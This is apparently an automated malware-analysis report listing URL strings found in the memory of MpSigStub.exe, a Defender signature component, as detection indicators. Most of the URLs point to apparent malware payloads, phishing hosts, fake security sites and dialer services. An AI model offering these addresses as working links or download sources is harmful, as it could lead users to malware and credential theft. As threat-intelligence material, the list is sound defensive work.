Source: MpSigStub.exe, 00000023.00000003.18309645507.0000015B1A404000.00000004.00000001.sdmp, MpSigStub.exe, 00000023.00000003.18322924550.0000015B1B0F3000.00000004.00000001.sdmp String found in binary or memory: http://navsmart.info
Source: MpSigStub.exe, 00000023.00000003.18426595439.0000015B1BB86000.00000004.00000001.sdmp String found in binary or memory: http://ncb.com.pe/media-views/pool=67/frenchclicks/
Source: MpSigStub.exe, 00000023.00000003.18423368163.0000015B1C1B6000.00000004.00000001.sdmp String found in binary or memory: http://ncccnnnc.cn/img/index.php
Source: MpSigStub.exe, 00000023.00000003.18299634028.0000015B1AF1A000.00000004.00000001.sdmp String found in binary or memory: http://netmahal.portalsepeti.com/?bd=sc&oem=ntsvc&uid=
Source: MpSigStub.exe, 00000023.00000003.18334831739.0000015B1A746000.00000004.00000001.sdmp String found in binary or memory: http://network.nocreditcard.com/DialHTML
Source: MpSigStub.exe, 00000023.00000003.18424566697.0000015B1C41E000.00000004.00000001.sdmp String found in binary or memory: http://network.nocreditcard.com/DialHTML/OSB/final.php3
Source: MpSigStub.exe, 00000023.00000003.18424566697.0000015B1C41E000.00000004.00000001.sdmp String found in binary or memory: http://network.nocreditcard.com/DialHTML/OSB/wait.php3
Source: MpSigStub.exe, 00000023.00000003.18427196191.0000015B1AB46000.00000004.00000001.sdmp String found in binary or memory: http://networksecurityx.hopto.org
Source: MpSigStub.exe, 00000023.00000003.18298772777.0000015B1A8DA000.00000004.00000001.sdmp String found in binary or memory: http://nevefe.com/wp-content/themes/calliope/wp-front.php
Source: MpSigStub.exe, 00000023.00000003.18424989390.0000015B1C5AA000.00000004.00000001.sdmp String found in binary or memory: http://nevergreen.net/456
Source: MpSigStub.exe, 00000023.00000003.18425885690.0000015B1BCD0000.00000004.00000001.sdmp String found in binary or memory: http://new.beahh.com/startup.php
Source: MpSigStub.exe, 00000023.00000003.18344475813.0000015B1C1D6000.00000004.00000001.sdmp String found in binary or memory: http://newglobalinternationalsewdifwefkseifodwe.duckdns.org/vbc/document.doc
Source: MpSigStub.exe, 00000023.00000003.18345359888.0000015B1A789000.00000004.00000001.sdmp String found in binary or memory: http://news.7654.com/mini_new3
Source: MpSigStub.exe, 00000023.00000003.18423819335.0000015B1B1FA000.00000004.00000001.sdmp String found in binary or memory: http://newsibrand.info/e.js
Source: MpSigStub.exe, 00000023.00000003.18423819335.0000015B1B1FA000.00000004.00000001.sdmp String found in binary or memory: http://newsibrand.info/f2/f.js
Source: MpSigStub.exe, 00000023.00000003.18423819335.0000015B1B1FA000.00000004.00000001.sdmp String found in binary or memory: http://newsibrand.info/s.js
Source: MpSigStub.exe, 00000023.00000003.18336414128.0000015B1BF22000.00000004.00000001.sdmp String found in binary or memory: http://newsystemlaunchwithnewmethodforserverfil.duckdns.org/document_v_001241.doc
Source: MpSigStub.exe, 00000023.00000003.18429220503.0000015B1A3C2000.00000004.00000001.sdmp String found in binary or memory: http://nfinx.info
Source: MpSigStub.exe, 00000023.00000003.18423819335.0000015B1B1FA000.00000004.00000001.sdmp String found in binary or memory: http://nh4esf33e.from-ia.com/
Source: MpSigStub.exe, 00000023.00000003.18315964598.0000015B1A481000.00000004.00000001.sdmp String found in binary or memory: http://nicescroll.areaaperta.com
Source: MpSigStub.exe, 00000023.00000003.18427547415.0000015B1B8F2000.00000004.00000001.sdmp String found in binary or memory: http://nid-help-pchange.atwebpages.com/home/web/download.php?filename=%s&key=%s
Source: MpSigStub.exe, 00000023.00000003.18427547415.0000015B1B8F2000.00000004.00000001.sdmp String found in binary or memory: http://nid-help-pchange.atwebpages.com/home/web/post.php
Source: MpSigStub.exe, 00000023.00000003.18429740183.0000015B1B2C1000.00000004.00000001.sdmp String found in binary or memory: http://nigera21.pansy.ero0101.com/set_inf.php?id=ero257.wmv&sid=
Source: MpSigStub.exe, 00000023.00000003.18327176542.0000015B1B61C000.00000004.00000001.sdmp String found in binary or memory: http://nimabi7.gnway.cc/seoul/kics/login.html
Source: MpSigStub.exe, 00000023.00000003.18307169245.0000015B1A4C3000.00000004.00000001.sdmp String found in binary or memory: http://nmextensions.com/preconfirm.php?sid=0&aid=0&said=0
Source: MpSigStub.exe, 00000023.00000003.18326614272.0000015B1A717000.00000004.00000001.sdmp String found in binary or memory: http://no.sinabc.net/abc.exe
Source: MpSigStub.exe, 00000023.00000003.18341814408.0000015B1C2D4000.00000004.00000001.sdmp String found in binary or memory: http://novacf.org/
Source: MpSigStub.exe, 00000023.00000003.18429740183.0000015B1B2C1000.00000004.00000001.sdmp String found in binary or memory: http://nq4k.fellatiomovefilehost.net/movie.php?id=movies_n01.wmv&sid=
Source: MpSigStub.exe, 00000023.00000003.18433124639.0000015B1B6E2000.00000004.00000001.sdmp String found in binary or memory: http://ns1.natalnosso.info:8082/windows.pac
Source: MpSigStub.exe, 00000023.00000003.18426294063.0000015B1BD11000.00000004.00000001.sdmp String found in binary or memory: http://ns33617.ovh.net/~clubregi/cartaoht.exe
Source: MpSigStub.exe, 00000023.00000003.18314518681.0000015B1B7A8000.00000004.00000001.sdmp String found in binary or memory: http://nsis.sf.net/NSIS_Error
Source: MpSigStub.exe, 00000023.00000003.18314518681.0000015B1B7A8000.00000004.00000001.sdmp String found in binary or memory: http://nsis.sf.net/NSIS_Errorx
Source: MpSigStub.exe, 00000023.00000003.18309645507.0000015B1A404000.00000004.00000001.sdmp String found in binary or memory: http://nt010.cn/e/j.js
Source: MpSigStub.exe, 00000023.00000003.18286213062.0000015B1A381000.00000004.00000001.sdmp String found in binary or memory: http://nta.hopto.org/mpa/nd.doc
Source: MpSigStub.exe, 00000023.00000003.18337818328.0000015B1BB10000.00000004.00000001.sdmp String found in binary or memory: http://nthnuest.com:40000/tickets
Source: MpSigStub.exe, 00000023.00000003.18433793263.0000015B1AEE2000.00000004.00000001.sdmp String found in binary or memory: http://ntlligent.info/tds/
Source: MpSigStub.exe, 00000023.00000003.18424133495.0000015B1C0F0000.00000004.00000001.sdmp String found in binary or memory: http://nutricaoedesenvolvimento.com.br/i/i.sct
Source: MpSigStub.exe, 00000023.00000003.18427547415.0000015B1B8F2000.00000004.00000001.sdmp String found in binary or memory: http://o%66%66%49%63e%2e%46%41q%53%65%72v.%43%6f%4d/%46%41%51%2e%6a%73
Source: MpSigStub.exe, 00000023.00000003.18326614272.0000015B1A717000.00000004.00000001.sdmp String found in binary or memory: http://o1.o1wy.com/miss/
Source: MpSigStub.exe, 00000023.00000003.18326614272.0000015B1A717000.00000004.00000001.sdmp String found in binary or memory: http://o1a.cn/Counter/NewCounter.asp?Param=
Source: MpSigStub.exe, 00000023.00000003.18433793263.0000015B1AEE2000.00000004.00000001.sdmp String found in binary or memory: http://obscurewax.ru/joystick.js
Source: MpSigStub.exe, 00000023.00000003.18428156417.0000015B1C02A000.00000004.00000001.sdmp String found in binary or memory: http://oc6mkf4efqrjp2ue6qp6vmz4ofyjmlo6dtqiklqb2q546bnqeu66tbyd.onion
Source: MpSigStub.exe, 00000023.00000003.18426595439.0000015B1BB86000.00000004.00000001.sdmp String found in binary or memory: http://ocean-v.com/wp-content/
Source: MpSigStub.exe, 00000023.00000003.18350085117.0000015B1B6E3000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.digicert.com0C
Source: MpSigStub.exe, 00000023.00000003.18426595439.0000015B1BB86000.00000004.00000001.sdmp String found in binary or memory: http://oddbods.co.uk/D6yd9x/
Source: MpSigStub.exe, 00000023.00000003.18288248948.0000015B1B1FB000.00000004.00000001.sdmp String found in binary or memory: http://offensiveware.com/
Source: MpSigStub.exe, 00000023.00000003.18429220503.0000015B1A3C2000.00000004.00000001.sdmp String found in binary or memory: http://office-archive-input.com/scan.wbk?raw=true
Source: MpSigStub.exe, 00000023.00000003.18433793263.0000015B1AEE2000.00000004.00000001.sdmp String found in binary or memory: http://office-archives.duckdns.org/
Source: MpSigStub.exe, 00000023.00000003.18433793263.0000015B1AEE2000.00000004.00000001.sdmp String found in binary or memory: http://office-cleaner-commander.com/
Source: MpSigStub.exe, 00000023.00000003.18429220503.0000015B1A3C2000.00000004.00000001.sdmp String found in binary or memory: http://office-cleaner-indexes.com/project.rtf
Source: MpSigStub.exe, 00000023.00000003.18429220503.0000015B1A3C2000.00000004.00000001.sdmp String found in binary or memory: http://office-cleaner-indexes.com/update.doc
Source: MpSigStub.exe, 00000023.00000003.18429740183.0000015B1B2C1000.00000004.00000001.sdmp String found in binary or memory: http://office-service-secs.com/blm.task
Source: MpSigStub.exe, 00000023.00000003.18318671001.0000015B1C4A2000.00000004.00000001.sdmp String found in binary or memory: http://officefiletransferintergration.mangospot.net/..-.............................................
Source: MpSigStub.exe, 00000023.00000003.18428156417.0000015B1C02A000.00000004.00000001.sdmp String found in binary or memory: http://ogirikidanielifeanyi.com/wp-content/upgrade/neworder.html
Source: MpSigStub.exe, 00000023.00000003.18345035369.0000015B1B176000.00000004.00000001.sdmp String found in binary or memory: http://ogp.me/ns
Source: MpSigStub.exe, 00000023.00000003.18429740183.0000015B1B2C1000.00000004.00000001.sdmp String found in binary or memory: http://ogrc.fellatiomovefilehost.net/movie.php?id=movies_n01.wmv&sid=
Source: MpSigStub.exe, 00000023.00000003.18427547415.0000015B1B8F2000.00000004.00000001.sdmp String found in binary or memory: http://old.forwart.ru/paid-invoice-credit-card-receipt/
Source: MpSigStub.exe, 00000023.00000003.18315964598.0000015B1A481000.00000004.00000001.sdmp String found in binary or memory: http://omstreaming.net/omunelegende/xxx.min.js
Source: MpSigStub.exe, 00000023.00000003.18319632958.0000015B1BDD9000.00000004.00000001.sdmp String found in binary or memory: http://on5.biz/docs/home/
Source: MpSigStub.exe, 00000023.00000003.18346670516.0000015B1AC31000.00000004.00000001.sdmp String found in binary or memory: http://onecs-live.azureedge.net
Source: MpSigStub.exe, 00000023.00000003.18426294063.0000015B1BD11000.00000004.00000001.sdmp String found in binary or memory: http://onedrivenet.xyz/work/30.vbs
Source: MpSigStub.exe, 00000023.00000003.18432465628.0000015B1B9FA000.00000004.00000001.sdmp String found in binary or memory: http://oneprivatecloudshareandfileprotectagenci.duckdns.org/receipt/invoice_651253.doc
Source: MpSigStub.exe, 00000023.00000003.18424566697.0000015B1C41E000.00000004.00000001.sdmp String found in binary or memory: http://online-docu-sign-st.com/yytr.png
Source: MpSigStub.exe, 00000023.00000003.18313187984.0000015B1B305000.00000004.00000001.sdmp String found in binary or memory: http://online-game-group.ru/download.php
Source: MpSigStub.exe, 00000023.00000003.18423819335.0000015B1B1FA000.00000004.00000001.sdmp String found in binary or memory: http://online-security-center.com/
Source: MpSigStub.exe, 00000023.00000003.18423368163.0000015B1C1B6000.00000004.00000001.sdmp String found in binary or memory: http://online-stats201.info/ur.php
Source: MpSigStub.exe, 00000023.00000003.18428156417.0000015B1C02A000.00000004.00000001.sdmp String found in binary or memory: http://online.pdf.com.tropicaldesign.com.br/)
Source: MpSigStub.exe, 00000023.00000003.18424566697.0000015B1C41E000.00000004.00000001.sdmp String found in binary or memory: http://online2you.org/search.php?sid=1
Source: MpSigStub.exe, 00000023.00000003.18330938423.0000015B1AA81000.00000004.00000001.sdmp String found in binary or memory: http://onlinesearch4meds.com
Source: MpSigStub.exe, 00000023.00000003.18423819335.0000015B1B1FA000.00000004.00000001.sdmp String found in binary or memory: http://onlinesecuritynet.com/
Source: MpSigStub.exe, 00000023.00000003.18429220503.0000015B1A3C2000.00000004.00000001.sdmp String found in binary or memory: http://oo.shmtb.info:888/phone.exe
Source: MpSigStub.exe, 00000023.00000003.18346827221.0000015B1B1B9000.00000004.00000001.sdmp String found in binary or memory: http://opendownloadmanager.com/privacy-policy.html
Source: MpSigStub.exe, 00000023.00000003.18434111043.0000015B1AF23000.00000004.00000001.sdmp String found in binary or memory: http://openopen.usite.pro/b/
Source: MpSigStub.exe, 00000023.00000003.18434111043.0000015B1AF23000.00000004.00000001.sdmp String found in binary or memory: http://openopen.usite.pro/b/b.ico
Source: MpSigStub.exe, 00000023.00000003.18432465628.0000015B1B9FA000.00000004.00000001.sdmp String found in binary or memory: http://openym.info/pdf/
Source: MpSigStub.exe, 00000023.00000003.18425422653.0000015B1C5EB000.00000004.00000001.sdmp String found in binary or memory: http://opercomex.co/wp/wp-includes/images/wlw/don.html)
Source: MpSigStub.exe, 00000023.00000003.18431805767.0000015B1BFA6000.00000004.00000001.sdmp String found in binary or memory: http://orcult.0lx.net/tcgeneration.htmg
Source: MpSigStub.exe, 00000023.00000003.18322243559.0000015B1A504000.00000004.00000001.sdmp String found in binary or memory: http://os.tiviviv.com/Vittalia/
Source: MpSigStub.exe, 00000023.00000003.18322243559.0000015B1A504000.00000004.00000001.sdmp String found in binary or memory: http://os.tiviviv.com/Vittalia/x
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp String found in binary or memory: http://outfish.bounceme.net/outl.dot
Source: MpSigStub.exe, 00000023.00000003.18428156417.0000015B1C02A000.00000004.00000001.sdmp String found in binary or memory: http://ow.ly/1pyr308vbgz)
Source: MpSigStub.exe, 00000023.00000003.18428156417.0000015B1C02A000.00000004.00000001.sdmp String found in binary or memory: http://ow.ly/6gex303pfnn)
Source: MpSigStub.exe, 00000023.00000003.18432136853.0000015B1BFE7000.00000004.00000001.sdmp String found in binary or memory: http://ow.ly/QoHbJ
Source: MpSigStub.exe, 00000023.00000003.18428156417.0000015B1C02A000.00000004.00000001.sdmp String found in binary or memory: http://ow.ly/gwzp304opw4)
Source: MpSigStub.exe, 00000023.00000003.18432465628.0000015B1B9FA000.00000004.00000001.sdmp String found in binary or memory: http://ow.ly/gxqw308htwv)
Source: MpSigStub.exe, 00000023.00000003.18432465628.0000015B1B9FA000.00000004.00000001.sdmp String found in binary or memory: http://ow.ly/qiml30afntj)
Source: MpSigStub.exe, 00000023.00000003.18324547737.0000015B1B0B1000.00000004.00000001.sdmp String found in binary or memory: http://ow.ly/tdiy30flmvv
Source: MpSigStub.exe, 00000023.00000003.18431805767.0000015B1BFA6000.00000004.00000001.sdmp String found in binary or memory: http://owwwc.com/mm/
Source: MpSigStub.exe, 00000023.00000003.18327508493.0000015B1B6A0000.00000004.00000001.sdmp String found in binary or memory: http://p.b69kq.com/
Source: MpSigStub.exe, 00000023.00000003.18286213062.0000015B1A381000.00000004.00000001.sdmp String found in binary or memory: http://p.estonine.com
Source: MpSigStub.exe, 00000023.00000003.18290902842.0000015B1BFA6000.00000004.00000001.sdmp String found in binary or memory: http://p.iask.com/p?k=%s
Source: MpSigStub.exe, 00000023.00000003.18327508493.0000015B1B6A0000.00000004.00000001.sdmp String found in binary or memory: http://p.k3qh4.com/
Source: MpSigStub.exe, 00000023.00000003.18335134155.0000015B1A914000.00000004.00000001.sdmp String found in binary or memory: http://p.netund.com/go/
Source: MpSigStub.exe, 00000023.00000003.18290902842.0000015B1BFA6000.00000004.00000001.sdmp String found in binary or memory: http://p.zhongsou.com/p?w=%s
Source: MpSigStub.exe, 00000023.00000003.18431805767.0000015B1BFA6000.00000004.00000001.sdmp String found in binary or memory: http://p6920.cloudserver255.com/0az7vjb9jbefbkmu#########
Source: MpSigStub.exe, 00000023.00000003.18299634028.0000015B1AF1A000.00000004.00000001.sdmp String found in binary or memory: http://packetstorm.securify.com/0010-exploits/unicodexecute2.pl
Source: MpSigStub.exe, 00000023.00000003.18431115827.0000015B1AFEA000.00000004.00000001.sdmp String found in binary or memory: http://padgettconsultants.ca/tau.gif
Source: MpSigStub.exe, 00000023.00000003.18321417418.0000015B1B6C0000.00000004.00000001.sdmp String found in binary or memory: http://pads289.net
Source: MpSigStub.exe, 00000023.00000003.18336414128.0000015B1BF22000.00000004.00000001.sdmp String found in binary or memory: http://page.zhongsou.com/ps?tps=2&cc=%s&aid=CA%s&w=
Source: MpSigStub.exe, 00000023.00000003.18428156417.0000015B1C02A000.00000004.00000001.sdmp String found in binary or memory: http://painel.moboymoboy.site/paste.php?pw=
Source: MpSigStub.exe, 00000023.00000003.18424989390.0000015B1C5AA000.00000004.00000001.sdmp String found in binary or memory: http://pancern.scotpaker.com.br/busterinjetc.zip
Source: MpSigStub.exe, 00000023.00000003.18431115827.0000015B1AFEA000.00000004.00000001.sdmp String found in binary or memory: http://pankus.3utilities.com/bars/banner/decipher/preparations/mxdmfq.dot
Source: MpSigStub.exe, 00000023.00000003.18427547415.0000015B1B8F2000.00000004.00000001.sdmp String found in binary or memory: http://pantscow.ru:8080/vector_graphic.js
Source: MpSigStub.exe, 00000023.00000003.18433793263.0000015B1AEE2000.00000004.00000001.sdmp String found in binary or memory: http://paparra.net/invoice/
Source: MpSigStub.exe, 00000023.00000003.18329049691.0000015B1ABCB000.00000004.00000001.sdmp String found in binary or memory: http://partners.sena.com/doc/inv-
Source: MpSigStub.exe, 00000023.00000003.18429220503.0000015B1A3C2000.00000004.00000001.sdmp String found in binary or memory: http://passagensvhc.online/66.rtf
Source: MpSigStub.exe, 00000023.00000003.18423368163.0000015B1C1B6000.00000004.00000001.sdmp String found in binary or memory: http://pastebin.com/
Source: MpSigStub.exe, 00000023.00000003.18337818328.0000015B1BB10000.00000004.00000001.sdmp, MpSigStub.exe, 00000023.00000003.18430797596.0000015B1AE5D000.00000004.00000001.sdmp, MpSigStub.exe, 00000023.00000003.18433793263.0000015B1AEE2000.00000004.00000001.sdmp String found in binary or memory: http://pastebin.com/raw/
Source: MpSigStub.exe, 00000023.00000003.18327176542.0000015B1B61C000.00000004.00000001.sdmp String found in binary or memory: http://pastebin.com/raw/L774bn1U
Source: MpSigStub.exe, 00000023.00000003.18327176542.0000015B1B61C000.00000004.00000001.sdmp String found in binary or memory: http://pastebin.com/raw/L774bn1Ux
Source: MpSigStub.exe, 00000023.00000003.18424566697.0000015B1C41E000.00000004.00000001.sdmp String found in binary or memory: http://patriciasmith.co.za/excelfolder/pdffiles)
Source: MpSigStub.exe, 00000023.00000003.18432136853.0000015B1BFE7000.00000004.00000001.sdmp String found in binary or memory: http://patvenzklito.tk/wp/wp-includes/images/100.png
Source: MpSigStub.exe, 00000023.00000003.18322243559.0000015B1A504000.00000004.00000001.sdmp String found in binary or memory: http://paufderhar07ol.ru.com/bb.html
Source: MpSigStub.exe, 00000023.00000003.18327176542.0000015B1B61C000.00000004.00000001.sdmp String found in binary or memory: http://pc-scan-online.com/l2.php?t=
Source: MpSigStub.exe, 00000023.00000003.18289300479.0000015B1BD55000.00000004.00000001.sdmp String found in binary or memory: http://pcmaticplus.com/success.html
Source: MpSigStub.exe, 00000023.00000003.18317322207.0000015B1B5DB000.00000004.00000001.sdmp String found in binary or memory: http://pcvark.com
Source: MpSigStub.exe, 00000023.00000003.18431115827.0000015B1AFEA000.00000004.00000001.sdmp String found in binary or memory: http://perfectequipments.com/bm1/.tmp/.1.jstype=text/javascript
Source: MpSigStub.exe, 00000023.00000003.18425422653.0000015B1C5EB000.00000004.00000001.sdmp String found in binary or memory: http://persefoni-rooms-toroni.gr/pdf/uzie/actions.php%22%20method%3d%22post
Source: MpSigStub.exe, 00000023.00000003.18433793263.0000015B1AEE2000.00000004.00000001.sdmp String found in binary or memory: http://petmovea.com
Source: MpSigStub.exe, 00000023.00000003.18429740183.0000015B1B2C1000.00000004.00000001.sdmp String found in binary or memory: http://pettingmovefilehost.net/movie.php?id=movies_n01.wmv&cid=
Source: MpSigStub.exe, 00000023.00000003.18429740183.0000015B1B2C1000.00000004.00000001.sdmp String found in binary or memory: http://pettingmovefilehost.net/movie.php?id=movies_n01.wmv&sid=
Source: MpSigStub.exe, 00000023.00000003.18290355074.0000015B1AEB4000.00000004.00000001.sdmp String found in binary or memory: http://philippelaurent.org/rechnung/
Source: MpSigStub.exe, 00000023.00000003.18326614272.0000015B1A717000.00000004.00000001.sdmp String found in binary or memory: http://phimshock-share123vn.blogspot.com/
Source: MpSigStub.exe, 00000023.00000003.18431115827.0000015B1AFEA000.00000004.00000001.sdmp String found in binary or memory: http://pic-pic.pw
Source: MpSigStub.exe, 00000023.00000003.18290902842.0000015B1BFA6000.00000004.00000001.sdmp String found in binary or memory: http://pic.sogou.com/pics?query=%s
Source: MpSigStub.exe, 00000023.00000003.18303445859.0000015B1B86F000.00000004.00000001.sdmp String found in binary or memory: http://picosoftnepal.net/ach-form/
Source: MpSigStub.exe, 00000023.00000003.18336414128.0000015B1BF22000.00000004.00000001.sdmp String found in binary or memory: http://pig.zhongsou.com/helpsimple/help.htm
Source: MpSigStub.exe, 00000023.00000003.18315964598.0000015B1A481000.00000004.00000001.sdmp String found in binary or memory: http://pig.zhongsou.com/pig3/dealip.asp?aa=%s&bb=%s
Source: MpSigStub.exe, 00000023.00000003.18344475813.0000015B1C1D6000.00000004.00000001.sdmp String found in binary or memory: http://pilasto.host/po.exe
Source: MpSigStub.exe, 00000023.00000003.18313187984.0000015B1B305000.00000004.00000001.sdmp String found in binary or memory: http://pilinno.info/cpi/promo.exe
Source: MpSigStub.exe, 00000023.00000003.18315964598.0000015B1A481000.00000004.00000001.sdmp String found in binary or memory: http://ping.180solutions.com
Source: MpSigStub.exe, 00000023.00000003.18297885321.0000015B1B490000.00000004.00000001.sdmp String found in binary or memory: http://ping.bizhi.sogou.com/repair.gif
Source: MpSigStub.exe, 00000023.00000003.18426889733.0000015B1BBC7000.00000004.00000001.sdmp String found in binary or memory: http://pingakshotechnologies.com/vicaaralife/
Source: MpSigStub.exe, 00000023.00000003.18432136853.0000015B1BFE7000.00000004.00000001.sdmp String found in binary or memory: http://pirsl.com.au/signatures/new.jpg
Source: MpSigStub.exe, 00000023.00000003.18334831739.0000015B1A746000.00000004.00000001.sdmp String found in binary or memory: http://pki.digidentity.eu/validatie0
Source: MpSigStub.exe, 00000023.00000003.18429740183.0000015B1B2C1000.00000004.00000001.sdmp String found in binary or memory: http://pl2.txt.pansy.ero0101.com/set_inf.php?id=ero257.wmv&sid=
Source: MpSigStub.exe, 00000023.00000003.18298772777.0000015B1A8DA000.00000004.00000001.sdmp String found in binary or memory: http://plaintexw.com/xx.dll
Source: MpSigStub.exe, 00000023.00000003.18428517155.0000015B1C06B000.00000004.00000001.sdmp String found in binary or memory: http://planilha.webcindario.com/planilha
Source: MpSigStub.exe, 00000023.00000003.18289622866.0000015B1BD96000.00000004.00000001.sdmp String found in binary or memory: http://play.videosongplayer.com/
Source: MpSigStub.exe, 00000023.00000003.18433465792.0000015B1B723000.00000004.00000001.sdmp String found in binary or memory: http://playboy.com/search?SearchString=
Source: MpSigStub.exe, 00000023.00000003.18289622866.0000015B1BD96000.00000004.00000001.sdmp String found in binary or memory: http://playsong.mediasongplayer.com/
Source: MpSigStub.exe, 00000023.00000003.18433793263.0000015B1AEE2000.00000004.00000001.sdmp String found in binary or memory: http://plet.dk/css/css.css
Source: MpSigStub.exe, 00000023.00000003.18344667874.0000015B1B06E000.00000004.00000001.sdmp String found in binary or memory: http://plugin-install.info/
Source: MpSigStub.exe, 00000023.00000003.18289622866.0000015B1BD96000.00000004.00000001.sdmp String found in binary or memory: http://plugin-installer.com/
Source: MpSigStub.exe, 00000023.00000003.18289622866.0000015B1BD96000.00000004.00000001.sdmp String found in binary or memory: http://plugin-installer.info/
Source: MpSigStub.exe, 00000023.00000003.18423819335.0000015B1B1FA000.00000004.00000001.sdmp String found in binary or memory: http://plugin.videosraros.info/chrome.xml
Source: MpSigStub.exe, 00000023.00000003.18349004213.0000015B1A9DB000.00000004.00000001.sdmp String found in binary or memory: http://pluginprovider.com/?rap
Source: MpSigStub.exe, 00000023.00000003.18309645507.0000015B1A404000.00000004.00000001.sdmp String found in binary or memory: http://pmevents.co.in/nd/index.php)
Source: MpSigStub.exe, 00000023.00000003.18426889733.0000015B1BBC7000.00000004.00000001.sdmp String found in binary or memory: http://pmxmrnull.dynu.net:
Source: MpSigStub.exe, 00000023.00000003.18425422653.0000015B1C5EB000.00000004.00000001.sdmp String found in binary or memory: http://pnronline.in/hiu.exe
Source: MpSigStub.exe, 00000023.00000003.18303445859.0000015B1B86F000.00000004.00000001.sdmp String found in binary or memory: http://policy.camerfirma.com0
Source: MpSigStub.exe, 00000023.00000003.18349339011.0000015B1A999000.00000004.00000001.sdmp String found in binary or memory: http://polifile.co/
Source: MpSigStub.exe, 00000023.00000003.18289945062.0000015B1AE5F000.00000004.00000001.sdmp String found in binary or memory: http://polk.freedynamicdns.org/boot/key.html
Source: MpSigStub.exe, 00000023.00000003.18426595439.0000015B1BB86000.00000004.00000001.sdmp String found in binary or memory: http://pomphrett.co.uk/c7fb/install/language/verouiller.php
Source: MpSigStub.exe, 00000023.00000003.18428156417.0000015B1C02A000.00000004.00000001.sdmp String found in binary or memory: http://popall.com/lin/bbs.htm?code=talking&mode=1
Source: MpSigStub.exe, 00000023.00000003.18429740183.0000015B1B2C1000.00000004.00000001.sdmp String found in binary or memory: http://poppy97.pansy.ero0101.com/set_inf.php?id=ero257.wmv&sid=
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp String found in binary or memory: http://portal.usanativ.com/sites/default/files/nativsetup.exe
Source: MpSigStub.exe, 00000023.00000003.18429220503.0000015B1A3C2000.00000004.00000001.sdmp String found in binary or memory: http://portalconnectme.com/56778786598.doc
Source: MpSigStub.exe, 00000023.00000003.18432136853.0000015B1BFE7000.00000004.00000001.sdmp String found in binary or memory: http://portoseguropromissao.com.br/wp-content/uploads/revslider/templates/80s/z/z/z/po.zip.php
Source: MpSigStub.exe, 00000023.00000003.18298772777.0000015B1A8DA000.00000004.00000001.sdmp String found in binary or memory: http://post.medusaranch.com/abonento9.exe
Source: MpSigStub.exe, 00000023.00000003.18336414128.0000015B1BF22000.00000004.00000001.sdmp String found in binary or memory: http://potosxylogicalnreinforcementagency4thsdy.duckdns.org/document/
Source: MpSigStub.exe, 00000023.00000003.18322243559.0000015B1A504000.00000004.00000001.sdmp String found in binary or memory: http://ppdb2.stifar.ac.id/xwtaxkjqnq/
Source: MpSigStub.exe, 00000023.00000003.18423819335.0000015B1B1FA000.00000004.00000001.sdmp String found in binary or memory: http://premiumclass.bar/0pzional1a.dll
Source: MpSigStub.exe, 00000023.00000003.18423819335.0000015B1B1FA000.00000004.00000001.sdmp String found in binary or memory: http://premiumclass.cyou/0pzional1a.dll
Source: MpSigStub.exe, 00000023.00000003.18426294063.0000015B1BD11000.00000004.00000001.sdmp String found in binary or memory: http://pricklypear.com/adobgran.php
Source: MpSigStub.exe, 00000023.00000003.18433793263.0000015B1AEE2000.00000004.00000001.sdmp String found in binary or memory: http://primeroute.net/
Source: MpSigStub.exe, 00000023.00000003.18344475813.0000015B1C1D6000.00000004.00000001.sdmp String found in binary or memory: http://private0091111.duckdns.org/qagj/
Source: MpSigStub.exe, 00000023.00000003.18427841372.0000015B1B933000.00000004.00000001.sdmp String found in binary or memory: http://privateinvestigatorkendall.com/fo9cwuvlqwua
Source: MpSigStub.exe, 00000023.00000003.18313952102.0000015B1B3A0000.00000004.00000001.sdmp String found in binary or memory: http://protect.advancedcleaner.com/MjY5Mw==/2/
Source: MpSigStub.exe, 00000023.00000003.18313952102.0000015B1B3A0000.00000004.00000001.sdmp String found in binary or memory: http://protect.spyguardpro.com/MTkyNDE=/2/
Source: MpSigStub.exe, 00000023.00000003.18424566697.0000015B1C41E000.00000004.00000001.sdmp String found in binary or memory: http://prs.payperdownload.nl
Source: MpSigStub.exe, 00000023.00000003.18424566697.0000015B1C41E000.00000004.00000001.sdmp String found in binary or memory: http://prs.payperdownload.nl/radius/dialer_admin/geoip
Source: MpSigStub.exe, 00000023.00000003.18333278800.0000015B1AC5E000.00000004.00000001.sdmp String found in binary or memory: http://prs.payperdownload.nl/radius/dialer_admin/geoip.asp
Source: MpSigStub.exe, 00000023.00000003.18350085117.0000015B1B6E3000.00000004.00000001.sdmp String found in binary or memory: http://psget.net/GetPsGet.ps1x
Source: MpSigStub.exe, 00000023.00000003.18432136853.0000015B1BFE7000.00000004.00000001.sdmp String found in binary or memory: http://pssquared.com/invoice-status/tracking-number-and-invoice-of-your-order/
Source: MpSigStub.exe, 00000023.00000003.18286213062.0000015B1A381000.00000004.00000001.sdmp String found in binary or memory: http://psynergi.dk/data
Source: MpSigStub.exe, 00000023.00000003.18428156417.0000015B1C02A000.00000004.00000001.sdmp String found in binary or memory: http://ptnetproject.info/yrniii/yrniii/yrniii/yrniii/index.php
Source: MpSigStub.exe, 00000023.00000003.18433465792.0000015B1B723000.00000004.00000001.sdmp String found in binary or memory: http://pub03832.duckdns.org/rwab/image.png
Source: MpSigStub.exe, 00000023.00000003.18327176542.0000015B1B61C000.00000004.00000001.sdmp String found in binary or memory: http://pubs.vmware.com
Source: MpSigStub.exe, 00000023.00000003.18429740183.0000015B1B2C1000.00000004.00000001.sdmp String found in binary or memory: http://pulp99.com/
Source: MpSigStub.exe, 00000023.00000003.18432465628.0000015B1B9FA000.00000004.00000001.sdmp String found in binary or memory: http://pulp99.com/1.rtf
Source: MpSigStub.exe, 00000023.00000003.18430078945.0000015B1C0AE000.00000004.00000001.sdmp String found in binary or memory: http://purelyrighteous.com/redirect/amvubmlmzxiubw9uy3jpzwzmqde4mjuuy29t
Source: MpSigStub.exe, 00000023.00000003.18322924550.0000015B1B0F3000.00000004.00000001.sdmp String found in binary or memory: http://pusat-hacing.blogspot.com/
Source: MpSigStub.exe, 00000023.00000003.18430078945.0000015B1C0AE000.00000004.00000001.sdmp String found in binary or memory: http://pznjaslo.pl/wp-content/outstanding-invoices/
Source: MpSigStub.exe, 00000023.00000003.18427841372.0000015B1B933000.00000004.00000001.sdmp String found in binary or memory: http://q-i-e-n.com/
Source: MpSigStub.exe, 00000023.00000003.18298772777.0000015B1A8DA000.00000004.00000001.sdmp String found in binary or memory: http://qiiqur.com/frix.exe
